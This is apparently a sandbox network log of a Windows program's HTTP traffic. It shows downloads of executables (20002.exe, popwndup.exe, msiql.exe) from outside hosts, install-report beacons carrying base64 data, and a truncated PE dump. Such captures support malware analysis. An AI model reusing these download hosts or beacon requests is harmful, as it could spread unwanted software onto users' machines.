User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:29 GMT
Connection: close
Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>.. <style>.. body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} .. p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..
b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucid
a Console";font-size: .9em}.. .marker {font-weight: bold; colo
r: black;text-decoration: none;}.. .version {color: gray;}..
.error {margin-bottom: 10px;}.. .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..
</style>.. </head>.. <body bgcolor="white">.
. <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>.. <h2&
gt; <i>Runtime Error</i> </h2></span>..
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">.. <b> Description: </b>An application
error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
by browsers running on the local server machine... <

<<< skipped >>>

GET /get.aspx?url=hXXp://VVV.yeadesktop.com/ HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:23 GMT
Connection: close
Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>.. <style>.. body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} .. p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..
b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucid
a Console";font-size: .9em}.. .marker {font-weight: bold; colo
r: black;text-decoration: none;}.. .version {color: gray;}..
.error {margin-bottom: 10px;}.. .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..
</style>.. </head>.. <body bgcolor="white">.
. <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>.. <h2&
gt; <i>Runtime Error</i> </h2></span>..
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">.. <b> Description: </b>An application
error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
by browsers running on the local server machine... <

<<< skipped >>>

GET /20002.exe HTTP/1.1
User-Agent: Agent336712
Host: dl-o.1haitao.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/x-msdownload
Content-Length: 1339016
Connection: keep-alive
Date: Wed, 16 Aug 2017 14:05:07 GMT
x-oss-request-id: 59945113F4D4EC5D03C6CFF9
Accept-Ranges: bytes
ETag: "680D0B8CE81A562A0C5D5BD98FCA3B04"
Last-Modified: Tue, 08 Aug 2017 06:29:07 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 2922808158989109942
x-oss-storage-class: Standard
Content-MD5: aA0LjOgaVioMXVvZj8o7BA==
x-oss-server-time: 1
Via: cache34.l2de1[459,304-0,H], cache35.l2de1[2796,0], cache3.de1[0,200-0,H], cache9.de1[1,0]
Age: 2113
X-Cache: HIT TCP_MEM_HIT dirn:0:761339685
X-Swift-SaveTime: Wed, 16 Aug 2017 14:05:07 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: c31b1fd115028944204644535e
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........0(..QF..QF.
.QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...i:
.V.................^..........l2.......p....@.........................
.................................................t..........(.........
..8"..PL...........................................................p..
|............................text...t\.......^.................. ..`.r
data.......p.......b..............@..@.data...X............t..........
....@....ndata.......P...........................rsrc...(............z
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
.h?B..H.P.u..u..u....q@..B...SV.5p?B..E.WP.u....q@..e...E..E.P.u....q@
..}..e....Pp@........FR..VV..U... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Xp@..E...E.P.E.P.u....r@..u
....E..9}...w....~X.te.v4..Hp@....E.tU.}.j.W.E......E.......Dp@..vXW..
Lp@..u..5@p@.W...E..E.h ...Pj.h`7B.W...r@..u.W...u....E.P.u...Pr@._^3.
[.....L$...?B...Si.....VW.T.....tO.q.3.;5.?B.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5.?B.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

GET /20002.exe HTTP/1.1
User-Agent: Agent350596
Host: dl-o.1haitao.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/x-msdownload
Content-Length: 1339016
Connection: keep-alive
Date: Wed, 16 Aug 2017 14:05:07 GMT
x-oss-request-id: 59945113F4D4EC5D03C6CFF9
Accept-Ranges: bytes
ETag: "680D0B8CE81A562A0C5D5BD98FCA3B04"
Last-Modified: Tue, 08 Aug 2017 06:29:07 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 2922808158989109942
x-oss-storage-class: Standard
Content-MD5: aA0LjOgaVioMXVvZj8o7BA==
x-oss-server-time: 1
Via: cache34.l2de1[459,304-0,H], cache35.l2de1[2796,0], cache3.de1[0,200-0,H], cache9.de1[1,0]
Age: 2126
X-Cache: HIT TCP_MEM_HIT dirn:0:761339685
X-Swift-SaveTime: Wed, 16 Aug 2017 14:05:07 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: c31b1fd115028944334598834e
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........0(..QF..QF.
.QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...i:
.V.................^..........l2.......p....@.........................
.................................................t..........(.........
..8"..PL...........................................................p..
|............................text...t\.......^.................. ..`.r
data.......p.......b..............@..@.data...X............t..........
....@....ndata.......P...........................rsrc...(............z
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
.h?B..H.P.u..u..u....q@..B...SV.5p?B..E.WP.u....q@..e...E..E.P.u....q@
..}..e....Pp@........FR..VV..U... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Xp@..E...E.P.E.P.u....r@..u
....E..9}...w....~X.te.v4..Hp@....E.tU.}.j.W.E......E.......Dp@..vXW..
Lp@..u..5@p@.W...E..E.h ...Pj.h`7B.W...r@..u.W...u....E.P.u...Pr@._^3.
[.....L$...?B...Si.....VW.T.....tO.q.3.;5.?B.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5.?B.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

GET /get.aspx?url=hXXp://yeadesktopbr.com/ HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:40 GMT
Connection: close
Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>.. <style>.. body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} .. p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..
b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucid
a Console";font-size: .9em}.. .marker {font-weight: bold; colo
r: black;text-decoration: none;}.. .version {color: gray;}..
.error {margin-bottom: 10px;}.. .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..
</style>.. </head>.. <body bgcolor="white">.
. <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>.. <h2&
gt; <i>Runtime Error</i> </h2></span>..
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">.. <b> Description: </b>An application
error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
by browsers running on the local server machine... <

<<< skipped >>>

GET /get.aspx?url=hXXp://VVV.yeadesktop.com/ HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:26 GMT
Connection: close
Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>.. <style>.. body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} .. p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..
b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucid
a Console";font-size: .9em}.. .marker {font-weight: bold; colo
r: black;text-decoration: none;}.. .version {color: gray;}..
.error {margin-bottom: 10px;}.. .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..
</style>.. </head>.. <body bgcolor="white">.
. <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>.. <h2&
gt; <i>Runtime Error</i> </h2></span>..
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">.. <b> Description: </b>An application
error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
by browsers running on the local server machine... <

<<< skipped >>>

GET /reportInstallaaFinish.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ3RDA0Q0U4N0I5Nzg0QUQyQTk3RTc2N0RDRThDRkY1OEE1MkIwNURFRjg2Nzc4RDI1NzIyRUNGMjM1MUZFMTM3MDhDNzg5MTZDNjhDRUVFNTg3NjVDMkZBMjVFNDU5NjUwQ0VDRDVGQUM1OTk0RTgzMDlGRTlFMjNFNDE4Q0RBQUVFMzdBRDBCQTFDQkU1QTVDN0ZGRTAyN0YxNTYwM0VDMTI3MzZCODNCQTgyQzM5RDJERjBDMDdENTUyODAyNjQxRTNGRTZDRjlEMDcxNzNCMTBFM0Q0RkJFNDYwRjE3Qg== HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: xiaobingdou.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:42 GMT
Connection: close
Content-Length: 0


GET /anzhuang.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ3RDA0Q0U4N0I5Nzg0QUQyQTk3RTc2N0RDRThDRkY1ODRCOEU1N0QzMzhBQzQ0N0E5N0ZEMjRCQTI3QzE2RDU1ODE4QkUyQkRCNjk5M0EyQkUzQkUxMzY4NjdEQTcyQkU= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: xiaobingdou.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:24 GMT
Connection: close
Content-Length: 0


GET /get.aspx?url=hXXp://yeadesktopbr.com/ HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:41 GMT
Connection: close
Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>.. <style>.. body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} .. p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..
b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucid
a Console";font-size: .9em}.. .marker {font-weight: bold; colo
r: black;text-decoration: none;}.. .version {color: gray;}..
.error {margin-bottom: 10px;}.. .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..
</style>.. </head>.. <body bgcolor="white">.
. <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>.. <h2&
gt; <i>Runtime Error</i> </h2></span>..
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">.. <b> Description: </b>An application
error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
by browsers running on the local server machine... <

<<< skipped >>>

GET /get.aspx?url=hXXp://qtipr.com/ HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:30 GMT
Connection: close
Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>.. <style>.. body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} .. p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..
b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucid
a Console";font-size: .9em}.. .marker {font-weight: bold; colo
r: black;text-decoration: none;}.. .version {color: gray;}..
.error {margin-bottom: 10px;}.. .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..
</style>.. </head>.. <body bgcolor="white">.
. <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>.. <h2&
gt; <i>Runtime Error</i> </h2></span>..
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">.. <b> Description: </b>An application
error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
by browsers running on the local server machine... <

<<< skipped >>>

GET /iplookup/iplookup.php HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: int.dpool.sina.com.cn


HTTP/1.1 200 OK
Server: Sina
Date: Wed, 16 Aug 2017 14:40:18 GMT
Content-Type: text/html; charset=gbk
Content-Length: 20
Connection: close
DPOOL_HEADER: tyr105
Set-Cookie: INTDPOOL=dc04044687467eb79001316b5643db06;Path=/
POOLPOOL: intdpool
DPOOL_LB7_HEADER: apollo220
1.-1.-1...............


GET /upgrade/popwndup.exe HTTP/1.0
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: down.yeadesktop.com
Accept: */*
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Date: Wed, 16 Aug 2017 14:40:23 GMT
Content-Type: text/html
Connection: close
Set-Cookie: __cfduid=d701b8255597cf4961a559e74a22b2c391502894423; expires=Thu, 16-Aug-18 14:40:23 GMT; path=/; domain=.yeadesktop.com; HttpOnly
Server: cloudflare-nginx
CF-RAY: 38f5260211b18b70-KBP
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=gb2312"/>..<title>404 - ..
................</title>..<style type="text/css">..<!--
..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica,
sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} .
.h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0
;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;
} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family
:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#55
5555;}..#content{margin:0 0 0 2%;position:relative;}...content-contain
er{background:#FFF;width:96%;margin-top:8px;padding:10px;position:rela
tive;}..-->..</style>..</head>..<body>..<div i
d="header"><h1>..........</h1></div>..<div id=
"content">.. <div class="content-container"><fieldset>.
. <h2>404 - ..................</h2>.. <h3>........
..............................................</h3>.. </field
set></div>..</div>..</body>..</html>....

<<< skipped >>>

GET /get.aspx?url=hXXp://VVV.yeadesktop.com/ HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:26 GMT
Connection: close
Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>.. <style>.. body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} .. p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..
b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucid
a Console";font-size: .9em}.. .marker {font-weight: bold; colo
r: black;text-decoration: none;}.. .version {color: gray;}..
.error {margin-bottom: 10px;}.. .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..
</style>.. </head>.. <body bgcolor="white">.
. <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>.. <h2&
gt; <i>Runtime Error</i> </h2></span>..
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">.. <b> Description: </b>An application
error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
by browsers running on the local server machine... <

<<< skipped >>>

GET /get.aspx?url=hXXp://qtipr.com/ HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:33 GMT
Connection: close
Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>.. <style>.. body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} .. p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..
b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucid
a Console";font-size: .9em}.. .marker {font-weight: bold; colo
r: black;text-decoration: none;}.. .version {color: gray;}..
.error {margin-bottom: 10px;}.. .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..
</style>.. </head>.. <body bgcolor="white">.
. <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>.. <h2&
gt; <i>Runtime Error</i> </h2></span>..
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">.. <b> Description: </b>An application
error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
by browsers running on the local server machine... <

<<< skipped >>>

GET /get.aspx?url=hXXp://yeadesktopbr.com/ HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:36 GMT
Connection: close
Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>.. <style>.. body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} .. p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..
b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucid
a Console";font-size: .9em}.. .marker {font-weight: bold; colo
r: black;text-decoration: none;}.. .version {color: gray;}..
.error {margin-bottom: 10px;}.. .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..
</style>.. </head>.. <body bgcolor="white">.
. <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>.. <h2&
gt; <i>Runtime Error</i> </h2></span>..
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">.. <b> Description: </b>An application
error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
by browsers running on the local server machine... <

<<< skipped >>>

GET /get.aspx?url=hXXp://VVV.yeadesktop.com/ HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:28 GMT
Connection: close
Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>.. <style>.. body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} .. p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..
b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucid
a Console";font-size: .9em}.. .marker {font-weight: bold; colo
r: black;text-decoration: none;}.. .version {color: gray;}..
.error {margin-bottom: 10px;}.. .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..
</style>.. </head>.. <body bgcolor="white">.
. <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>.. <h2&
gt; <i>Runtime Error</i> </h2></span>..
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">.. <b> Description: </b>An application
error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
by browsers running on the local server machine... <

<<< skipped >>>

GET /get.aspx?url=hXXp://VVV.yeadesktop.com/ HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:23 GMT
Connection: close
Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>.. <style>.. body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} .. p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..
b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucid
a Console";font-size: .9em}.. .marker {font-weight: bold; colo
r: black;text-decoration: none;}.. .version {color: gray;}..
.error {margin-bottom: 10px;}.. .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..
</style>.. </head>.. <body bgcolor="white">.
. <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>.. <h2&
gt; <i>Runtime Error</i> </h2></span>..
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">.. <b> Description: </b>An application
error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
by browsers running on the local server machine... <

<<< skipped >>>

GET /get.aspx?url=hXXp://VVV.yeadesktop.com/ HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:27 GMT
Connection: close
Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>.. <style>.. body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} .. p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..
b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucid
a Console";font-size: .9em}.. .marker {font-weight: bold; colo
r: black;text-decoration: none;}.. .version {color: gray;}..
.error {margin-bottom: 10px;}.. .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..
</style>.. </head>.. <body bgcolor="white">.
. <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>.. <h2&
gt; <i>Runtime Error</i> </h2></span>..
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">.. <b> Description: </b>An application
error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
by browsers running on the local server machine... <

<<< skipped >>>

GET /offer/msiql.exe HTTP/1.1
Accept: */*
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: down.yeadesktop.com
Cookie: __cfduid=d5306f411be5b94d33d9913bbc141529d1502894419


HTTP/1.1 403 Forbidden
Date: Wed, 16 Aug 2017 14:40:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=10
Expires: Wed, 16 Aug 2017 14:40:31 GMT
